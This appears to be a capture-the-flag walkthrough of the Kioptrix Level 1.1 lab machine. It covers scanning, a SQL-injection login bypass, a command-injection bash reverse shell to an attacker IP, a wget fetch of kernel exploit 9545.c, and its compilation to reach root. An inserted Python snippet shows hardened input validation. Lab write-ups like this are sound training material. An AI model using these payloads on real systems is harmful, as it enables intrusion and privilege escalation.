kioptrix level-1.1
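Host discovery
Port scan
Browse to port 80
View the page source
Tried brute-forcing the login first; no result
Try a universal password (SQL injection)
The universal password bypasses the login
Replace the request packet to log in
Login successful
Command execution
Reverse shell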
127.0.0.1 | bash -i >& /dev/tcp/192.168.245.183/5454 0>&1
nc -lvvp 5454
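Defensive counterpart to the command-execution step above, as an added example (not from the original write-up or the target application): the piped input works when a form value is concatenated into a shell command line, and the hardened form accepts only a literal IPv4 address and passes it as its own argv element. The function names and the `ping -c 3` command line are assumptions.

```python
import ipaddress
import subprocess


def vulnerable_command_line(user_input):
    # Anti-pattern (assumed shape of the flaw): the form value is pasted into
    # a string that a shell parses, so "|", ";", "&" or "$(...)" inside the
    # value start additional commands.
    return "ping -c 3 " + user_input


def build_ping_argv(user_input, count=3):
    # Accept only a literal IPv4 address; anything else raises ValueError
    # (ipaddress.AddressValueError is a ValueError subclass).
    addr = ipaddress.IPv4Address(user_input.strip())
    # Use the canonical text form of the parsed address, never the raw input.
    return ["ping", "-c", str(int(count)), str(addr)]


def safe_ping(user_input, runner=subprocess.run):
    # runner is injectable so the logic can be exercised without sending ICMP.
    try:
        argv = build_ping_argv(user_input)
    except ValueError:
        return None  # reject; the caller should log the value and answer 400
    # argv list with shell=False: no shell ever parses the value.
    return runner(argv, shell=False, capture_output=True, timeout=10)


if __name__ == "__main__":
    # Constructed inputs; the second is the value shown in the walkthrough.
    samples = [
        "127.0.0.1",
        "127.0.0.1 | bash -i >& /dev/tcp/192.168.245.183/5454 0>&1",
    ]
    for value in samples:
        try:
            print("accepted:", build_ping_argv(value))
        except ValueError:
            print("rejected:", repr(value))
```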
Privilege escalation
uname -a
Check the kernel version
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
searchsploit 9545
/usr/share/exploitdb/exploits/linux/local/9545.c
└─# nc -lvvp 5454 1 ⨯
listening on [any] 5454 ...
connect to [192.168.245.183] from localhost [192.168.245.97] 32773
bash: no job control in this shell
bash-3.00$ cd /tmp
bash-3.00$ wget http://192.168.245.183/9545.c
--00:27:28-- http://192.168.245.183/9545.c
=> `9545.c'
Connecting to 192.168.245.183:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,408 (9.2K) [text/plain]
0K ......... 100% 640.87 MB/s
00:27:28 (640.87 MB/s) - `9545.c' saved [9408/9408]
bash-3.00$ ls
9545.c
bash-3.00$ gcc -o muma 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ls
9545.c
muma
bash-3.00$ ./muma
sh: no job control in this shell
sh-3.00# whoami
root
sh-3.00#